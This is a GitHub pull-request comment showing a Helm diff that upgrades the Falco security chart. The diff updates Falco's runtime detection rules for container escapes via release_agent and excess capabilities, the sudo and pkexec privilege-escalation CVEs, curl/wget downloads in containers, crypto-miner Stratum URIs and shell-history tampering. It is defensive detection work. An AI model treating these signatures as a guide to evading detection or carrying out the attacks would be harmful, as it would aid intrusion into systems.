+      condition: (proc.name in (keepalived, kube-keepalived) and fd.name=/etc/keepalived/keepalived.conf)
 
     - macro: etcd_manager_updating_dns
       condition: (container and proc.name=etcd-manager and fd.name=/etc/hosts)
@@ -1592,6 +2043,7 @@
         and not nginx_writing_certs
         and not chef_client_writing_conf
         and not centrify_writing_krb
+        and not sssd_writing_krb
         and not cockpit_writing_conf
         and not ipsec_writing_conf
         and not httpd_writing_ssl_conf
@@ -2181,7 +2633,7 @@
               registry.access.redhat.com/sematext/agent,
               registry.access.redhat.com/sematext/logagent]
 
-    # These container images are allowed to run with --privileged
+    # These container images are allowed to run with --privileged and full set of capabilities
     - list: falco_privileged_images
       items: [
         docker.io/calico/node,
@@ -2199,10 +2651,12 @@
         gke.gcr.io/kube-proxy,
         gke.gcr.io/gke-metadata-server,
         gke.gcr.io/netd-amd64,
+        gke.gcr.io/watcher-daemonset,
         gcr.io/google-containers/prometheus-to-sd,
         k8s.gcr.io/ip-masq-agent-amd64,
         k8s.gcr.io/kube-proxy,
         k8s.gcr.io/prometheus-to-sd,
+        public.ecr.aws/falcosecurity/falco,
         quay.io/calico/node,
         sysdig/sysdig,
         sematext_images
@@ -2231,7 +2685,7 @@
     - list: falco_sensitive_mount_images
       items: [
         docker.io/sysdig/sysdig, sysdig/sysdig,
-        docker.io/falcosecurity/falco, falcosecurity/falco,
+        docker.io/falcosecurity/falco, falcosecurity/falco, public.ecr.aws/falcosecurity/falco,
         gcr.io/google_containers/hyperkube,
         gcr.io/google_containers/kube-proxy, docker.io/calico/node,
         docker.io/rook/toolbox, docker.io/cloudnativelabs/kube-router, docker.io/consul,
@@ -2247,19 +2701,6 @@
                   container.image.repository in (falco_sensitive_mount_images) or
                   container.image.repository startswith quay.io/sysdig/)
 
-    # These container images are allowed to run with hostnetwork=true
-    - list: falco_hostnetwork_images
-      items: [
-        gcr.io/google-containers/prometheus-to-sd,
-        gcr.io/projectcalico-org/typha,
-        gcr.io/projectcalico-org/node,
-        gke.gcr.io/gke-metadata-server,
-        gke.gcr.io/kube-proxy,
-        gke.gcr.io/netd-amd64,
-        k8s.gcr.io/ip-masq-agent-amd64
-        k8s.gcr.io/prometheus-to-sd,
-        ]
-
     # Add conditions to this macro (probably in a separate file,
     # overwriting this macro) to specify additional containers that are
     # allowed to perform sensitive mounts.
@@ -2280,14 +2721,40 @@
       priority: INFO
       tags: [container, cis, mitre_privilege_escalation, mitre_lateral_movement]
 
+    # These capabilities were used in the past to escape from containers
+    - macro: excessively_capable_container
+      condition: >
+        (thread.cap_permitted contains CAP_SYS_ADMIN
+        or thread.cap_permitted contains CAP_SYS_MODULE
+        or thread.cap_permitted contains CAP_SYS_RAWIO
+        or thread.cap_permitted contains CAP_SYS_PTRACE
+        or thread.cap_permitted contains CAP_SYS_BOOT
+        or thread.cap_permitted contains CAP_SYSLOG
+        or thread.cap_permitted contains CAP_DAC_READ_SEARCH
+        or thread.cap_permitted contains CAP_NET_ADMIN
+        or thread.cap_permitted contains CAP_BPF)
+
+    - rule: Launch Excessively Capable Container
+      desc: Detect container started with a powerful set of capabilities. Exceptions are made for known trusted images.
+      condition: >
+        container_started and container
+        and excessively_capable_container
+        and not falco_privileged_containers
+        and not user_privileged_containers
+      output: Excessively capable container started (user=%user.name user_loginuid=%user.loginuid command=%proc.cmdline %container.info image=%container.image.repository:%container.image.tag cap_permitted=%thread.cap_permitted)
+      priority: INFO
+      tags: [container, cis, mitre_privilege_escalation, mitre_lateral_movement]
+
+
     # For now, only considering a full mount of /etc as
     # sensitive. Ideally, this would also consider all subdirectories
-    # below /etc as well, but the globbing mechanism used by sysdig
+    # below /etc as well, but the globbing mechanism
     # doesn't allow exclusions of a full pattern, only single characters.
     - macro: sensitive_mount
       condition: (container.mount.dest[/proc*] != "N/A" or
                   container.mount.dest[/var/run/docker.sock] != "N/A" or
                   container.mount.dest[/var/run/crio/crio.sock] != "N/A" or
+                  container.mount.dest[/run/containerd/containerd.sock] != "N/A" or
                   container.mount.dest[/var/lib/kubelet] != "N/A" or
                   container.mount.dest[/var/lib/kubelet/pki] != "N/A" or
                   container.mount.dest[/] != "N/A" or
@@ -2415,7 +2882,8 @@
         '"sh -c  -t -i"',
         '"sh -c openssl version"',
         '"bash -c id -Gn kafadmin"',
-        '"sh -c /bin/sh -c ''date +%%s''"'
+        '"sh -c /bin/sh -c ''date +%%s''"',
+        '"sh -c /usr/share/lighttpd/create-mime.conf.pl"'
         ]
 
     # This list allows for easy additions to the set of commands allowed
@@ -2574,7 +3042,7 @@
     #   output: "sshd sent error message to syslog (error=%evt.buffer)"
     #   priority: WARNING
 
-    - macro: somebody_becoming_themself
+    - macro: somebody_becoming_themselves
       condition: ((user.name=nobody and evt.arg.uid=nobody) or
                   (user.name=www-data and evt.arg.uid=www-data) or
                   (user.name=_apt and evt.arg.uid=_apt) or
@@ -2612,7 +3080,7 @@
         evt.type=setuid and evt.dir=>
         and (known_user_in_container or not container)
         and not (user.name=root or user.uid=0)
-        and not somebody_becoming_themself
+        and not somebody_becoming_themselves
         and not proc.name in (known_setuid_binaries, userexec_binaries, mail_binaries, docker_binaries,
                               nomachine_binaries)
         and not proc.name startswith "runc:"
@@ -2636,7 +3104,7 @@
         activity by any programs that can manage users, passwords, or permissions. sudo and su are excluded.
         Activity in containers is also excluded--some containers create custom users on top
         of a base linux distribution at startup.
-        Some innocuous commandlines that don't actually change anything are excluded.
+        Some innocuous command lines that don't actually change anything are excluded.
       condition: >
         spawned_process and proc.name in (user_mgmt_binaries) and
         not proc.name in (su, sudo, lastlog, nologin, unix_chkpwd) and not container and
@@ -2672,7 +3140,7 @@
       desc: creating any files below /dev other than known programs that manage devices. Some rootkits hide files in /dev.
       condition: >
         fd.directory = /dev and
-        (evt.type = creat or ((evt.type = open or evt.type = openat) and evt.arg.flags contains O_CREAT))
+        (evt.type = creat or (evt.type in (open,openat,openat2) and evt.arg.flags contains O_CREAT))
         and not proc.name in (dev_creation_binaries)
         and not fd.name in (allowed_dev_files)
         and not fd.name startswith /dev/tty
@@ -2686,7 +3154,7 @@
     # explicitly enumerate the container images that you want to allow
     # access to EC2 metadata. In this main falco rules file, there isn't
     # any way to know all the containers that should have access, so any
-    # container is alllowed, by repeating the "container" macro. In the
+    # container is allowed, by repeating the "container" macro. In the
     # overridden macro, the condition would look something like
     # (container.image.repository = vendor/container-1 or
     # container.image.repository = vendor/container-2 or ...)
@@ -2740,7 +3208,8 @@
          docker.io/sysdig/sysdig, docker.io/falcosecurity/falco,
          sysdig/sysdig, falcosecurity/falco,
          fluent/fluentd-kubernetes-daemonset, prom/prometheus,
-         ibm_cloud_containers)
+         ibm_cloud_containers,
+         public.ecr.aws/falcosecurity/falco)
          or (k8s.ns.name = "kube-system"))
 
     - macro: k8s_api_server
@@ -2944,27 +3413,29 @@
         WARNING
       tags: [process, mitre_persistence]
 
+    # here `ash_history` will match both `bash_history` and `ash_history`
     - macro: modify_shell_history
       condition: >
         (modify and (
-          evt.arg.name contains "bash_history" or
-          evt.arg.name contains "zsh_history" or
+          evt.arg.name endswith "ash_history" or
+          evt.arg.name endswith "zsh_history" or
           evt.arg.name contains "fish_read_history" or
           evt.arg.name endswith "fish_history" or
-          evt.arg.oldpath contains "bash_history" or
-          evt.arg.oldpath contains "zsh_history" or
+          evt.arg.oldpath endswith "ash_history" or
+          evt.arg.oldpath endswith "zsh_history" or
           evt.arg.oldpath contains "fish_read_history" or
           evt.arg.oldpath endswith "fish_history" or
-          evt.arg.path contains "bash_history" or
-          evt.arg.path contains "zsh_history" or
+          evt.arg.path endswith "ash_history" or
+          evt.arg.path endswith "zsh_history" or
           evt.arg.path contains "fish_read_history" or
           evt.arg.path endswith "fish_history"))
 
+    # here `ash_history` will match both `bash_history` and `ash_history`
     - macro: truncate_shell_history
       condition: >
         (open_write and (
-          fd.name contains "bash_history" or
-          fd.name contains "zsh_history" or
+          fd.name endswith "ash_history" or
+          fd.name endswith "zsh_history" or
           fd.name contains "fish_read_history" or
           fd.name endswith "fish_history") and evt.arg.flags contains "O_TRUNC")
 
@@ -3003,7 +3474,7 @@
       items: [hyperkube, kubelet, k3s-agent]
 
     # This macro should be overridden in user rules as needed. This is useful if a given application
-    # should not be ignored alltogether with the user_known_chmod_applications list, but only in
+    # should not be ignored altogether with the user_known_chmod_applications list, but only in
     # specific conditions.
     - macro: user_known_set_setuid_or_setgid_bit_conditions
       condition: (never_true)
@@ -3082,8 +3553,18 @@
         create_symlink and
         (evt.arg.target in (sensitive_file_names) or evt.arg.target in (sensitive_directory_names))
       output: >
-        Symlinks created over senstivie files (user=%user.name user_loginuid=%user.loginuid command=%proc.cmdline target=%evt.arg.target linkpath=%evt.arg.linkpath parent_process=%proc.pname)
-      priority: NOTICE
+        Symlinks created over sensitive files (user=%user.name user_loginuid=%user.loginuid command=%proc.cmdline target=%evt.arg.target linkpath=%evt.arg.linkpath parent_process=%proc.pname)
+      priority: WARNING
+      tags: [file, mitre_exfiltration]
+
+    - rule: Create Hardlink Over Sensitive Files
+      desc: Detect hardlink created over sensitive files
+      condition: >
+        create_hardlink and
+        (evt.arg.oldpath in (sensitive_file_names))
+      output: >
+        Hardlinks created over sensitive files (user=%user.name user_loginuid=%user.loginuid command=%proc.cmdline target=%evt.arg.oldpath linkpath=%evt.arg.newpath parent_process=%proc.pname)
+      priority: WARNING
       tags: [file, mitre_exfiltration]
 
     - list: miner_ports
@@ -3176,11 +3657,10 @@
       condition: (fd.sport in (miner_ports) and fd.sip.name in (miner_domains))
 
     - macro: net_miner_pool
-      condition: (evt.type in (sendto, sendmsg) and evt.dir=< and (fd.net != "127.0.0.0/8" and not fd.snet in (rfc_1918_addresses)) and ((minerpool_http) or (minerpool_https) or (minerpool_other)))
+      condition: (evt.type in (sendto, sendmsg, connect) and evt.dir=< and (fd.net != "127.0.0.0/8" and not fd.snet in (rfc_1918_addresses)) and ((minerpool_http) or (minerpool_https) or (minerpool_other)))
 
     - macro: trusted_images_query_miner_domain_dns
-      condition: (container.image.repository in (docker.io/falcosecurity/falco, falcosecurity/falco))
-      append: false
+      condition: (container.image.repository in (docker.io/falcosecurity/falco, falcosecurity/falco, public.ecr.aws/falcosecurity/falco))
 
     # The rule is disabled by default.
     # Note: falco will send DNS request to resolve miner pool domain which may trigger alerts in your environment.
@@ -3188,13 +3668,13 @@
       desc: Miners typically connect to miner pools on common ports.
       condition: net_miner_pool and not trusted_images_query_miner_domain_dns
       enabled: false
-      output: Outbound connection to IP/Port flagged by cryptoioc.ch (command=%proc.cmdline port=%fd.rport ip=%fd.rip container=%container.info image=%container.image.repository)
+      output: Outbound connection to IP/Port flagged by https://cryptoioc.ch (command=%proc.cmdline port=%fd.rport ip=%fd.rip container=%container.info image=%container.image.repository)
       priority: CRITICAL
       tags: [network, mitre_execution]
 
     - rule: Detect crypto miners using the Stratum protocol
       desc: Miners typically specify the mining pool to connect to with a URI that begins with 'stratum+tcp'
-      condition: spawned_process and proc.cmdline contains "stratum+tcp"
+      condition: spawned_process and (proc.cmdline contains "stratum+tcp" or proc.cmdline contains "stratum2+tcp" or proc.cmdline contains "stratum+ssl" or proc.cmdline contains "stratum2+ssl")
       output: Possible miner running (command=%proc.cmdline container=%container.info image=%container.image.repository)
       priority: CRITICAL
       tags: [process, mitre_execution]
@@ -3330,7 +3810,7 @@
 
     # The two Container Drift rules below will fire when a new executable is created in a container.
     # There are two ways to create executables - file is created with execution permissions or permissions change of existing file.
-    # We will use a new sysdig filter, is_open_exec, to find all files creations with execution permission, and will trace all chmods in a container.
+    # We will use a new filter, is_open_exec, to find all files creations with execution permission, and will trace all chmods in a container.
     # The use case we are targeting here is an attempt to execute code that was not shipped as part of a container (drift) -
     # an activity that might be malicious or non-compliant.
     # Two things to pay attention to:
@@ -3363,7 +3843,7 @@
     - rule: Container Drift Detected (open+create)
       desc: New executable created in a container due to open+create
       condition: >
-        evt.type in (open,openat,creat) and
+        evt.type in (open,openat,openat2,creat) and
         evt.is_open_exec=true and
         container and
         not runc_writing_exec_fifo and
@@ -3413,7 +3893,7 @@
     # A privilege escalation to root through heap-based buffer overflow
     - rule: Sudo Potential Privilege Escalation
       desc: Privilege escalation vulnerability affecting sudo (<= 1.9.5p2). Executing sudo using sudoedit -s or sudoedit -i command with command-line argument that ends with a single backslash character from an unprivileged user it's possible to elevate the user privileges to root.
-      condition: spawned_process and user.uid != 0 and proc.name=sudoedit and (proc.args contains -s or proc.args contains -i) and (proc.args contains "\ " or proc.args endswith \)
+      condition: spawned_process and user.uid != 0 and (proc.name=sudoedit or proc.name = sudo) and (proc.args contains -s or proc.args contains -i or proc.args contains --login) and (proc.args contains "\ " or proc.args endswith \)
       output: "Detect Sudo Privilege Escalation Exploit (CVE-2021-3156) (user=%user.name parent=%proc.pname cmdline=%proc.cmdline %container.info)"
       priority: CRITICAL
       tags: [filesystem, mitre_privilege_escalation]
@@ -3431,13 +3911,17 @@
     - macro: mount_info
       condition: (proc.args="" or proc.args intersects ("-V", "-l", "-h"))
 
+    - macro: user_known_mount_in_privileged_containers
+      condition: (never_true)
+
     - rule: Mount Launched in Privileged Container
-      desc: Detect file system mount happened inside a privilegd container which might lead to container escape.
+      desc: Detect file system mount happened inside a privileged container which might lead to container escape.
       condition: >
         spawned_process and container
         and container.privileged=true
         and proc.name=mount
         and not mount_info
+        and not user_known_mount_in_privileged_containers
       output: Mount was executed inside a privileged container (user=%user.name user_loginuid=%user.loginuid command=%proc.cmdline %container.info image=%container.image.repository:%container.image.tag)
       priority: WARNING
       tags: [container, cis, mitre_lateral_movement]
@@ -3460,12 +3944,64 @@
       priority: CRITICAL
       tags: [syscall, mitre_defense_evasion]
 
+    - list: ingress_remote_file_copy_binaries
+      items: [wget]
+
+    - macro: ingress_remote_file_copy_procs
+      condition: (proc.name in (ingress_remote_file_copy_binaries))
+
+    # Users should overwrite this macro to specify conditions under which a
+    # Custom condition for use of ingress remote file copy tool in container
+    - macro: user_known_ingress_remote_file_copy_activities
+      condition: (never_true)
+
+    -  macro: curl_download
+       condition: proc.name = curl and
+                  (proc.cmdline contains " -o " or
+                  proc.cmdline contains " --output " or
+                  proc.cmdline contains " -O " or
+                  proc.cmdline contains " --remote-name ")
+
+    - rule: Launch Ingress Remote File Copy Tools in Container
+      desc: Detect ingress remote file copy tools launched in container
+      condition: >
+        spawned_process and
+        container and
+        (ingress_remote_file_copy_procs or curl_download) and
+        not user_known_ingress_remote_file_copy_activities
+      output: >
+        Ingress remote file copy tool launched in container (user=%user.name user_loginuid=%user.loginuid command=%proc.cmdline parent_process=%proc.pname
+        container_id=%container.id container_name=%container.name image=%container.image.repository:%container.image.tag)
+      priority: NOTICE
+      tags: [network, process, mitre_command_and_control]
+
+    # This rule helps detect CVE-2021-4034:
+    # A privilege escalation to root through memory corruption
+    - rule: Polkit Local Privilege Escalation Vulnerability (CVE-2021-4034)
+      desc: "This rule detects an attempt to exploit a privilege escalation vulnerability in Polkit's pkexec. By running specially crafted code, a local user can leverage this flaw to gain root privileges on a compromised system"
+      condition:
+        spawned_process and user.uid != 0 and proc.name=pkexec and proc.args = ''
+      output:
+        "Detect Polkit pkexec Local Privilege Escalation Exploit (CVE-2021-4034) (user=%user.loginname uid=%user.loginuid command=%proc.cmdline args=%proc.args)"
+      priority: CRITICAL
+      tags: [process, mitre_privilege_escalation]
+
+
+    - rule: Detect release_agent File Container Escapes
+      desc: "This rule detect an attempt to exploit a container escape using release_agent file. By running a container with certains capabilities, a privileged user can modify release_agent file and escape from the container"
+      condition:
+        open_write and container and fd.name endswith release_agent and (user.uid=0 or thread.cap_effective contains CAP_DAC_OVERRIDE) and thread.cap_effective contains CAP_SYS_ADMIN
+      output:
+        "Detect an attempt to exploit a container escape using release_agent file (user=%user.name user_loginuid=%user.loginuid filename=%fd.name %container.info image=%container.image.repository:%container.image.tag cap_effective=%thread.cap_effective)"
+      priority: CRITICAL
+      tags: [container, mitre_privilege_escalation, mitre_lateral_movement]
+
     # Application rules have moved to application_rules.yaml. Please look
     # there if you want to enable them by adding to
     # falco_rules.local.yaml.
   k8s_audit_rules.yaml: |
     #
-    # Copyright (C) 2019 The Falco Authors.
+    # Copyright (C) 2022 The Falco Authors.
     #
     #
     # Licensed under the Apache License, Version 2.0 (the "License");
@@ -3480,7 +4016,14 @@
     # See the License for the specific language governing permissions and
     # limitations under the License.
     #
-    - required_engine_version: 2
+
+    - required_engine_version: 12
+
+    - required_plugin_versions:
+      - name: k8saudit
+        version: 0.1.0
+      - name: json
+        version: 0.3.0
 
     # Like always_true/always_false, but works with k8s audit events
     - macro: k8s_audit_always_true
@@ -3517,13 +4060,24 @@
         cluster-autoscaler,
         "system:addon-manager",
         "cloud-controller-manager",
-        "eks:node-manager",
         "system:kube-controller-manager"
         ]
 
+    - list: eks_allowed_k8s_users
+      items: [
+        "eks:node-manager",
+        "eks:certificate-controller",
+        "eks:fargate-scheduler",
+        "eks:k8s-metrics",
+        "eks:authenticator",
+        "eks:cluster-event-watcher",
+        "eks:nodewatcher",
+        "eks:pod-identity-mutating-webhook"
+        ]
+    -
     - rule: Disallowed K8s User
       desc: Detect any k8s operation by users outside of an allowed set of users.
-      condition: kevt and non_system_user and not ka.user.name in (allowed_k8s_users)
+      condition: kevt and non_system_user and not ka.user.name in (allowed_k8s_users) and not ka.user.name in (eks_allowed_k8s_users)
       output: K8s Operation performed by user not in allowed list of users (user=%ka.user.name target=%ka.target.name/%ka.target.resource verb=%ka.verb uri=%ka.uri resp=%ka.response.code)
       priority: WARNING
       source: k8s_audit
@@ -3541,6 +4095,9 @@
     - macro: response_successful
       condition: (ka.response.code startswith 2)
 
+    - macro: kget
+      condition: ka.verb=get
+
     - macro: kcreate
       condition: ka.verb=create
 
@@ -3586,6 +4143,12 @@
     - macro: health_endpoint
       condition: ka.uri=/healthz
 
+    - macro: live_endpoint
+      condition: ka.uri=/livez
+
+    - macro: ready_endpoint
+      condition: ka.uri=/readyz
+
     - rule: Create Disallowed Pod
       desc: >
         Detect an attempt to start a pod with a container image outside of a list of allowed images.
@@ -3618,6 +4181,19 @@
       source: k8s_audit
       tags: [k8s]
 
+    # These container images are allowed to run with hostnetwork=true
+    - list: falco_hostnetwork_images
+      items: [
+        gcr.io/google-containers/prometheus-to-sd,
+        gcr.io/projectcalico-org/typha,
+        gcr.io/projectcalico-org/node,
+        gke.gcr.io/gke-metadata-server,
+        gke.gcr.io/kube-proxy,
+        gke.gcr.io/netd-amd64,
+        k8s.gcr.io/ip-masq-agent-amd64
+        k8s.gcr.io/prometheus-to-sd,
+        ]
+
     # Corresponds to K8s CIS Benchmark 1.7.4
     - rule: Create HostNetwork Pod
       desc: Detect an attempt to start a pod using the host network.
@@ -3627,6 +4203,28 @@
       source: k8s_audit
       tags: [k8s]
 
+    - list: falco_hostpid_images
+      items: []
+
+    - rule: Create HostPid Pod
+      desc: Detect an attempt to start a pod using the host pid namespace.
+      condition: kevt and pod and kcreate and ka.req.pod.host_pid intersects (true) and not ka.req.pod.containers.image.repository in (falco_hostpid_images)
+      output: Pod started using host pid namespace (user=%ka.user.name pod=%ka.resp.name ns=%ka.target.namespace images=%ka.req.pod.containers.image)
+      priority: WARNING
+      source: k8s_audit
+      tags: [k8s]
+
+    - list: falco_hostipc_images
+      items: []
+
+    - rule: Create HostIPC Pod
+      desc: Detect an attempt to start a pod using the host ipc namespace.
+      condition: kevt and pod and kcreate and ka.req.pod.host_ipc intersects (true) and not ka.req.pod.containers.image.repository in (falco_hostipc_images)
+      output: Pod started using host ipc namespace (user=%ka.user.name pod=%ka.resp.name ns=%ka.target.namespace images=%ka.req.pod.containers.image)
+      priority: WARNING
+      source: k8s_audit
+      tags: [k8s]
+
     - macro: user_known_node_port_service
       condition: (k8s_audit_never_true)
 
@@ -3661,7 +4259,7 @@
     - rule: Anonymous Request Allowed
       desc: >
         Detect any request made by the anonymous user that was allowed
-      condition: kevt and ka.user.name=system:anonymous and ka.auth.decision="allow" and not health_endpoint
+      condition: kevt and ka.user.name=system:anonymous and ka.auth.decision="allow" and not health_endpoint and not live_endpoint and not ready_endpoint
       output: Request by anonymous user allowed (user=%ka.user.name verb=%ka.verb uri=%ka.uri reason=%ka.auth.reason))
       priority: WARNING
       source: k8s_audit
@@ -3741,6 +4339,7 @@
         k8s.gcr.io/kube-apiserver,
         gke.gcr.io/kube-proxy,
         gke.gcr.io/netd-amd64,
+        gke.gcr.io/watcher-daemonset,
         k8s.gcr.io/addon-resizer
         k8s.gcr.io/prometheus-to-sd,
         k8s.gcr.io/k8s-dns-dnsmasq-nanny-amd64,
@@ -3768,9 +4367,31 @@
       items: []
 
     - list: known_sa_list
-      items: ["pod-garbage-collector","resourcequota-controller","cronjob-controller","generic-garbage-collector",
-              "daemon-set-controller","endpointslice-controller","deployment-controller", "replicaset-controller",
-              "endpoint-controller", "namespace-controller", "statefulset-controller", "disruption-controller"]
+      items: [
+        coredns,
+        coredns-autoscaler,
+        cronjob-controller,
+        daemon-set-controller,
+        deployment-controller,
+        disruption-controller,
+        endpoint-controller,
+        endpointslice-controller,
+        endpointslicemirroring-controller,
+        generic-garbage-collector,
+        horizontal-pod-autoscaler,
+        job-controller,
+        namespace-controller,
+        node-controller,
+        persistent-volume-binder,
+        pod-garbage-collector,
+        pv-protection-controller,
+        pvc-protection-controller,
+        replicaset-controller,
+        resourcequota-controller,
+        root-ca-cert-publisher,
+        service-account-controller,
+        statefulset-controller
+        ]
 
     - macro: trusted_sa
       condition: (ka.target.name in (known_sa_list, user_known_sa_list))
@@ -3797,7 +4418,7 @@
       tags: [k8s]
 
     # Detect any attempt to create a ClusterRoleBinding to the cluster-admin user
-    # (exapand this to any built-in cluster role that does "sensitive" things)
+    # (expand this to any built-in cluster role that does "sensitive" things)
     - rule: Attach to cluster-admin Role
       desc: Detect any attempt to create a ClusterRoleBinding to the cluster-admin user
       condition: kevt and clusterrolebinding and kcreate and ka.req.binding.role=cluster-admin
@@ -3910,7 +4531,7 @@
     - rule: K8s Serviceaccount Created
       desc: Detect any attempt to create a service account
       condition: (kactivity and kcreate and serviceaccount and response_successful)
-      output: K8s Serviceaccount Created (user=%ka.user.name user=%ka.target.name ns=%ka.target.namespace resp=%ka.response.code decision=%ka.auth.decision reason=%ka.auth.reason)
+      output: K8s Serviceaccount Created (user=%ka.user.name serviceaccount=%ka.target.name ns=%ka.target.namespace resp=%ka.response.code decision=%ka.auth.decision reason=%ka.auth.reason)
       priority: INFO
       source: k8s_audit
       tags: [k8s]
@@ -3918,7 +4539,7 @@
     - rule: K8s Serviceaccount Deleted
       desc: Detect any attempt to delete a service account
       condition: (kactivity and kdelete and serviceaccount and response_successful)
-      output: K8s Serviceaccount Deleted (user=%ka.user.name user=%ka.target.name ns=%ka.target.namespace resp=%ka.response.code decision=%ka.auth.decision reason=%ka.auth.reason)
+      output: K8s Serviceaccount Deleted (user=%ka.user.name serviceaccount=%ka.target.name ns=%ka.target.namespace resp=%ka.response.code decision=%ka.auth.decision reason=%ka.auth.reason)
       priority: INFO
       source: k8s_audit
       tags: [k8s]
@@ -3964,13 +4585,37 @@
       tags: [k8s]
 
     - rule: K8s Secret Deleted
-      desc: Detect any attempt to delete a secret Service account tokens are excluded.
+      desc: Detect any attempt to delete a secret. Service account tokens are excluded.
       condition: (kactivity and kdelete and secret and ka.target.namespace!=kube-system and non_system_user and response_successful)
       output: K8s Secret Deleted (user=%ka.user.name secret=%ka.target.name ns=%ka.target.namespace resp=%ka.response.code decision=%ka.auth.decision reason=%ka.auth.reason)
       priority: INFO
       source: k8s_audit
       tags: [k8s]
 
+    - rule: K8s Secret Get Successfully
+      desc: >
+        Detect any attempt to get a secret. Service account tokens are excluded.
+      condition: >
+        secret and kget
+        and kactivity
+        and response_successful
+      output: K8s Secret Get Successfully (user=%ka.user.name secret=%ka.target.name ns=%ka.target.namespace resp=%ka.response.code decision=%ka.auth.decision reason=%ka.auth.reason)
+      priority: ERROR
+      source: k8s_audit
+      tags: [k8s]
+
+    - rule:  K8s Secret Get Unsuccessfully Tried
+      desc: >
+        Detect an unsuccessful attempt to get the secret. Service account tokens are excluded.
+      condition: >
+        secret and kget
+        and kactivity
+        and not response_successful
+      output: K8s Secret Get Unsuccessfully Tried (user=%ka.user.name secret=%ka.target.name ns=%ka.target.namespace resp=%ka.response.code decision=%ka.auth.decision reason=%ka.auth.reason)
+      priority: WARNING
+      source: k8s_audit
+      tags: [k8s]
+
     # This rule generally matches all events, and as a result is disabled
     # by default. If you wish to enable these events, modify the
     # following macro.
@@ -4003,7 +4648,7 @@
     # cluster creation. This may signify a permission setting too broader.
     # As we can't check for role of the user on a general ka.* event, this
     # may or may not be an administrator. Customize the full_admin_k8s_users
-    # list to your needs, and activate at your discrection.
+    # list to your needs, and activate at your discretion.
 
     # # How to test:
     # # Execute any kubectl command connected using default cluster user, as:
@@ -4184,8 +4829,8 @@
         app: falco
         role: security
       annotations:
-        checksum/config: 9ac2b16de3ea0caa56e07879f0d383db5a400f1e84c2e04d5f2cec53f8b23a4a
-        checksum/rules: 4fead7ed0d40bd6533c61315bc4089d124976d46b052192f768b9c97be5d405e
+        checksum/config: a34a6b941188f80f1ba27fd6af4fe16110ab9054660a706eac161bc2d2ceaaf7
+        checksum/rules: 97a8ecad02de96810bc54ca7e9b7dda56420f82b2c64e05504bedc6888119841
         checksum/certs: 01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b
     spec:
       serviceAccountName: falco
@@ -4196,7 +4841,7 @@
           operator: Exists
       containers:
         - name: falco
-          image: public.ecr.aws/falcosecurity/falco:0.30.0
+          image: public.ecr.aws/falcosecurity/falco:0.32.0
           imagePullPolicy: IfNotPresent
           resources:
             limits:
@@ -4211,11 +4856,14 @@
             - /usr/bin/falco
             - --cri
             - /run/containerd/containerd.sock
+            - --cri
+            - /run/crio/crio.sock
             - -K
             - /var/run/secrets/kubernetes.io/serviceaccount/token
             - -k
             - https://$(KUBERNETES_SERVICE_HOST)
-            - --k8s-node="${FALCO_K8S_NODE_NAME}"
+            - --k8s-node
+            - "$(FALCO_K8S_NODE_NAME)"
             - -pk
           env:
             - name: FALCO_K8S_NODE_NAME
@@ -4243,6 +4891,8 @@
           volumeMounts:
             - mountPath: /host/run/containerd/containerd.sock
               name: containerd-socket
+            - mountPath: /host/run/crio/crio.sock
+              name: crio-socket
             - mountPath: /host/dev
               name: dev-fs
               readOnly: true
@@ -4270,6 +4920,9 @@
         - name: containerd-socket
           hostPath:
             path: /var/run/k3s/containerd/containerd.sock
+        - name: crio-socket
+          hostPath:
+            path: /run/crio/crio.sock
         - name: dev-fs
           hostPath:
             path: /dev
@@ -4300,6 +4953,10 @@
                 path: falco_rules.local.yaml
               - key: application_rules.yaml
                 path: rules.available/application_rules.yaml
+              - key: k8s_audit_rules.yaml
+                path: k8s_audit_rules.yaml
+              - key: aws_cloudtrail_rules.yaml
+                path: aws_cloudtrail_rules.yaml
         - name: rules-volume
           configMap:
             name: falco-rules

@renovate renovate bot changed the title chore(deps): update helm release falco to v1.19.3 chore(deps): update helm release falco to v1.19.4 Jun 21, 2022
@github-actions
Copy link
Contributor

Path: cluster/apps/security/falco-system/falco/helm-release.yaml
Version: 1.16.0 -> 1.19.4

@@ -153,7 +153,7 @@
     release: "falco"
     heritage: "Helm"
 data:
-  falco.yaml: "# File(s) or Directories containing Falco rules, loaded at startup.\n# The name \"rules_file\" is only for backwards compatibility.\n# If the entry is a file, it will be read directly. If the entry is a directory,\n# every file in that directory will be read, in alphabetical order.\n#\n# falco_rules.yaml ships with the falco package and is overridden with\n# every new software version. falco_rules.local.yaml is only created\n# if it doesn't exist. If you want to customize the set of rules, add\n# your customizations to falco_rules.local.yaml.\n#\n# The files will be read in the order presented here, so make sure if\n# you have overrides they appear in later files.\nrules_file:\n  - /etc/falco/falco_rules.yaml\n  - /etc/falco/falco_rules.local.yaml\n  - /etc/falco/k8s_audit_rules.yaml\n  - /etc/falco/rules.d\n\n# If true, the times displayed in log messages and output messages\n# will be in ISO 8601. By default, times are displayed in the local\n# time zone, as governed by /etc/localtime.\ntime_format_iso_8601: false\n\n# Whether to output events in json or text\njson_output: true\n\n# When using json output, whether or not to include the \"output\" property\n# itself (e.g. \"File below a known binary directory opened for writing\n# (user=root ....\") in the json output.\njson_include_output_property: true\n\n# When using json output, whether or not to include the \"tags\" property\n# itself in the json output. If set to true, outputs caused by rules\n# with no tags will have a \"tags\" field set to an empty array. If set to\n# false, the \"tags\" field will not be included in the json output at all.\njson_include_tags_property: true\n\n# Send information logs to stderr and/or syslog Note these are *not* security\n# notification logs! These are just Falco lifecycle (and possibly error) logs.\nlog_stderr: true\nlog_syslog: true\n\n# Minimum log level to include in logs. Note: these levels are\n# separate from the priority field of rules. This refers only to the\n# log level of falco's internal logging. Can be one of \"emergency\",\n# \"alert\", \"critical\", \"error\", \"warning\", \"notice\", \"info\", \"debug\".\nlog_level: info\n\n# Minimum rule priority level to load and run. All rules having a\n# priority more severe than this level will be loaded/run.  Can be one\n# of \"emergency\", \"alert\", \"critical\", \"error\", \"warning\", \"notice\",\n# \"info\", \"debug\".\npriority: debug\n\n# Whether or not output to any of the output channels below is\n# buffered. Defaults to false\nbuffered_outputs: false\n\n# Falco uses a shared buffer between the kernel and userspace to pass\n# system call information. When falco detects that this buffer is\n# full and system calls have been dropped, it can take one or more of\n# the following actions:\n#   - \"ignore\": do nothing. If an empty list is provided, ignore is assumed.\n#   - \"log\": log a CRITICAL message noting that the buffer was full.\n#   - \"alert\": emit a falco alert noting that the buffer was full.\n#   - \"exit\": exit falco with a non-zero rc.\n#\n# The rate at which log/alert messages are emitted is governed by a\n# token bucket. The rate corresponds to one message every 30 seconds\n# with a burst of 10 